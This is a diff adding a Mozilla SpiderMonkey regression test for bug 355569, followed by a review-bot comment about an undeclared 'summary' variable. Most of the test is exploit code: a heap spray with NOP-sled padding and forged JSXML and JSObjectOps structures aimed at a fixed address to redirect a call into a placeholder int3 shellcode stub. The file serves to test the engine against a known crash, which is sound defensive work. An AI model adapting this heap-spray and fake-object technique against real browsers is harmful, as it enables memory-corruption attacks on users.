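--- /dev/null	Thu Jan 01 00:00:00 1970 +0000
+++ b/js/src/tests/js1_8_5/regress/regress-355569.js	Wed Dec 31 06:09:35 2014 +0100
@@ -0,0 +1,127 @@
+/* -*- Mode: java; tab-width:8; indent-tabs-mode: nil; c-basic-offset: 4 -*- */
+
+/* This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, You can obtain one at http://mozilla.org/MPL/2.0/. */
+
+var bug = 355569;
+var actual = '';
+var expect = '';
+
+printBugNumber (bug);
+printStatus (summary);
+
+var targetAddress = 0x12030010;
+var sprayParams = {
+ chunkSize: 16 * 1024 * 1024,
+ chunkCount: 16,
+ chunkMarker: 0xdeadface,
+ chunkAlign: 0x1000,
+ reservedSize: 1024
+};
+
+function makeExploitCode() {
+ /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
+ return "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
+}
+
+/*==========================================================================*/
+/*==========================================================================*/
+
+function packData(template, A) {
+ var n = 0, result = "", vl;
+ for(var i = 0; i < template.length; i++) {
+ var ch = template.charAt(i);
+ if(ch == "s" || ch == "S") {
+ vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff);
+ } else if(ch == "l" || ch == "L") { // XXX endian
+ vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff, vl >> 16);
+ } else if(ch == "=") {
+ result += String(A[n++]);
+ }
+ }
+ return result;
+}
+function buildStructure(worker, address) {
+ var offs = {}, result = "", context = {
+ append: function(k, v) { offs[k] = result.length * 2; result += v; },
+ address: function(k) { return address + ((k && offs[k]) || 0); }
+ }; worker(context); result = ""; worker(context); return result;
+}
+function repeatToLength(s, L) {
+ if(L <= s.length) { return s.substring(0, L); }
+ while(s.length <= L/2) { s += s; }
+ return s + s.substring(0, L - s.length);
+}
+function sprayData(data, params, rooter) {
+ var marker = packData("L", [ params.chunkMarker ]);
+ data += repeatToLength("\u9090", params.chunkAlign / 2 - data.length);
+ data = repeatToLength(data, (params.chunkSize - params.reservedSize) / 2);
+ for(var i = 0; i < params.chunkCount; i++) {
+ rooter[i] = marker + data + i;
+ }
+}
+
+function T_JSObject(map, slots)
+{ return packData("LL", arguments); }
+function T_JSObjectMap(nrefs, ops, nslots, freeslot)
+{ return packData("LLLL", arguments); }
+function T_JSObjectOps(
+ newObjectMap, destroyObjectMap, lookupProperty, defineProperty,
+ getProperty, setProperty, getAttributes, setAttributes,
+ deleteProperty, defaultValue, enumerate, checkAccess,
+ thisObject, dropProperty, call, construct,
+ xdrObject, hasInstance, setProto, setParent,
+ mark, clear, getRequiredSlot, setRequiredSlot
+) { return packData("LLLLLLLL LLLLLLLL LLLLLLLL", arguments); }
+
+function T_JSXML_LIST(
+ object, domnode, parent, name, xml_class, xml_flags,
+ kids_length, kids_capacity, kids_vector, kids_cursors,
+ xml_target, xml_targetprop
+) { return packData("LLLLSS LLLL LL", arguments); }
+function T_JSXML_ELEMENT(
+ object, domnode, parent, name, xml_class, xml_flags,
+ kids_length, kids_capacity, kids_vector, kids_cursors,
+ nses_length, nses_capacity, nses_vector, nses_cursors,
+ atrs_length, atrs_capacity, atrs_vector, atrs_cursors
+) { return packData("LLLLSS LLLL LLLL LLLL", arguments); }
+
+/*==========================================================================*/
+/*==========================================================================*/
+
+function makeExploitData(address) {
+ return buildStructure(function(ctx) {
+ ctx.append("xml-list",
+ T_JSXML_LIST(0, 0, 0, 0, 0, 0, 1, 0, ctx.address("xml-kids-vector"), 0, 0, 0));
+ ctx.append("xml-kids-vector",
+ packData("L", [ ctx.address("xml-element") ]));
+ ctx.append("xml-element",
+ T_JSXML_ELEMENT(ctx.address("object"), 0, 0, 0, 1, 0, 0, 0, 0, 0, /*c*/ 0, 0, 0, 0, /*d*/ 0, 0, 0, 0));
+ ctx.append("object",
+ T_JSObject(ctx.address("object-map"), 0));
+ ctx.append("object-map",
+ T_JSObjectMap(0, ctx.address("object-ops"), 0, 0));
+ ctx.append("object-ops",
+ T_JSObjectOps(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0));
+ ctx.append("exploit-code",
+ makeExploitCode(ctx));
+ }, address);
+}
+
+function exploit() {
+ sprayData(makeExploitData(targetAddress), sprayParams, this.rooter = {});
+ var numobj = new Number(targetAddress >> 1);
+ printStatus("probably not exploitable");
+}
+
+try
+{
+ exploit();
+}
+catch(ex)
+{
+}
+
+reportCompare(expect, actual);
+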
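Review bot: `summary` is used on the line `printStatus (summary);` but is never declared in this file (only `bug`, `actual` and `expect` are); unless the test harness itself defines it, that call throws a ReferenceError outside the try/catch and the test errors out before exploit() or reportCompare() is ever reached. Declare it with the other header variables, e.g. `var summary = 'Do not crash on regression data for bug 355569';` (constructed wording, adjust to taste). The empty `catch(ex) {}` together with `expect` and `actual` both being `''` makes this a crash-only test, which is reasonable for a regression of this kind but is worth stating explicitly above the `try`, e.g. `// Any exception from exploit() is irrelevant; the test passes as long as the engine does not crash.`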